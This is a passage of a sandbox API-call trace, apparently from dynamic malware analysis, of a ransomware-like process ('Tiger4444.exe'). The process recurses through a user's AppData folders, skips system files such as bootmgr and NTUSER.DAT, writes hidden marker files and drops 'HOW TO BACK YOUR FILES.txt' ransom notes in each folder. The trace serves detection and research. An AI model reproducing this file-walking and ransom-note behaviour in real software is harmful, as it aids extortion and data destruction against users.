-1 [0052.670] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2d8352f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2d8352f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2d8352f, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0052.670] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.670] lstrcpyW (in: lpString1=0x30aeb42, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.670] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.671] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.671] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xc30000 [0052.672] UnmapViewOfFile (lpBaseAddress=0xc30000) returned 1 [0052.672] CloseHandle (hObject=0x2c8) returned 1 [0052.672] CloseHandle (hObject=0x2ac) returned 1 [0052.672] GetCurrentThreadId () returned 0xfa8 [0052.672] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66368 [0052.672] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm" [0052.672] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc790d8 | out: hHeap=0xc50000) returned 1 [0052.672] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66360 | out: hHeap=0xc50000) returned 1 [0052.672] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm" [0052.672] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\" [0052.672] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\.BFC0E91B00AE8A0620D3" [0052.672] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\cm\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.673] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.681] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.683] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.683] CloseHandle (hObject=0x2ac) returned 1 [0052.684] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm") returned 64 [0052.684] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.684] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae631a53, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae631a53, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x8469aa6b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc730c8 [0052.684] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.684] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.684] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.684] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.684] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae631a53, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae631a53, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x8469aa6b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.684] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.684] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.684] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.684] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.684] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.684] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8469aa6b, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8469aa6b, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x846c0cc1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.684] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.684] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.684] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8469aa6b, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8469aa6b, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x846c0cc1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.684] FindClose (in: hFindFile=0xc730c8 | out: hFindFile=0xc730c8) returned 1 [0052.684] lstrcpyW (in: lpString1=0x30aeb2a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.684] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\connections\\cm\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.684] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a8 [0052.685] MapViewOfFile (hFileMappingObject=0x2a8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.686] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.686] CloseHandle (hObject=0x2a8) returned 1 [0052.686] CloseHandle (hObject=0x2ac) returned 1 [0052.686] GetCurrentThreadId () returned 0xfa8 [0052.686] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66668 [0052.686] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project" [0052.686] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0052.686] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66660 | out: hHeap=0xc50000) returned 1 [0052.686] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project" [0052.686] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\" [0052.686] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\.BFC0E91B00AE8A0620D3" [0052.686] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.687] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.689] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.689] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.690] CloseHandle (hObject=0x2ac) returned 1 [0052.690] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project") returned 52 [0052.690] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.690] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0x846c0cc1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0052.690] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.690] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.690] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.690] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.690] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0x846c0cc1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.690] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.690] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.690] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.690] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.691] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.691] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x846c0cc1, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x846c0cc1, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x846c0cc1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.691] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.691] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.691] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 1 [0052.691] lstrcmpiW (lpString1="16", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.691] lstrcmpiW (lpString1="16", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.691] lstrcmpiW (lpString1="16", lpString2="Tiger4444.exe") returned -1 [0052.691] lstrcmpiW (lpString1="16", lpString2=".") returned 1 [0052.691] lstrcmpiW (lpString1="16", lpString2="..") returned 1 [0052.691] lstrcmpiW (lpString1="16", lpString2="windows") returned -1 [0052.691] lstrcmpiW (lpString1="16", lpString2="bootmgr") returned -1 [0052.691] lstrcmpiW (lpString1="16", lpString2="pagefile.sys") returned -1 [0052.691] lstrcmpiW (lpString1="16", lpString2="boot") returned -1 [0052.691] lstrcmpiW (lpString1="16", lpString2="ids.txt") returned -1 [0052.691] lstrcmpiW (lpString1="16", lpString2="NTUSER.DAT") returned -1 [0052.691] lstrcpyW (in: lpString1=0x30aeb12, lpString2="16" | out: lpString1="16") returned="16" [0052.691] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66360 [0052.691] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x70) returned 0xc89860 [0052.691] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66368 | out: ListHead=0xc66828, ListEntry=0xc66368) returned 0xc66628 [0052.691] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 0 [0052.691] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.691] lstrcpyW (in: lpString1=0x30aeb12, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.691] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.692] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a8 [0052.693] MapViewOfFile (hFileMappingObject=0x2a8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.693] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.693] CloseHandle (hObject=0x2a8) returned 1 [0052.693] CloseHandle (hObject=0x2ac) returned 1 [0052.693] GetCurrentThreadId () returned 0xfa8 [0052.693] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66368 [0052.693] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16" [0052.693] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0052.693] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66360 | out: hHeap=0xc50000) returned 1 [0052.693] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16" [0052.693] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\" [0052.693] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\.BFC0E91B00AE8A0620D3" [0052.693] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\ms project\\16\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.695] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.698] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.698] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.699] CloseHandle (hObject=0x2ac) returned 1 [0052.699] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16") returned 55 [0052.699] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.699] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0x846e862d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72ec8 [0052.699] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.699] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.699] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.699] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.699] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0x846e862d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.699] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.699] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.699] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.700] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.700] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.700] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x846e862d, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x846e862d, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x846f0f8f, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.700] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.700] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.700] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0052.700] lstrcmpiW (lpString1="en-US", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.700] lstrcmpiW (lpString1="en-US", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.700] lstrcmpiW (lpString1="en-US", lpString2="Tiger4444.exe") returned -1 [0052.700] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0052.700] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0052.700] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0052.700] lstrcmpiW (lpString1="en-US", lpString2="bootmgr") returned 1 [0052.700] lstrcmpiW (lpString1="en-US", lpString2="pagefile.sys") returned -1 [0052.700] lstrcmpiW (lpString1="en-US", lpString2="boot") returned 1 [0052.700] lstrcmpiW (lpString1="en-US", lpString2="ids.txt") returned -1 [0052.700] lstrcmpiW (lpString1="en-US", lpString2="NTUSER.DAT") returned -1 [0052.700] lstrcpyW (in: lpString1=0x30aeb18, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0052.700] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66660 [0052.700] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x7c) returned 0xc71c80 [0052.700] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66668 | out: ListHead=0xc66828, ListEntry=0xc66668) returned 0xc66628 [0052.700] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0052.700] FindClose (in: hFindFile=0xc72ec8 | out: hFindFile=0xc72ec8) returned 1 [0052.700] lstrcpyW (in: lpString1=0x30aeb18, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.700] 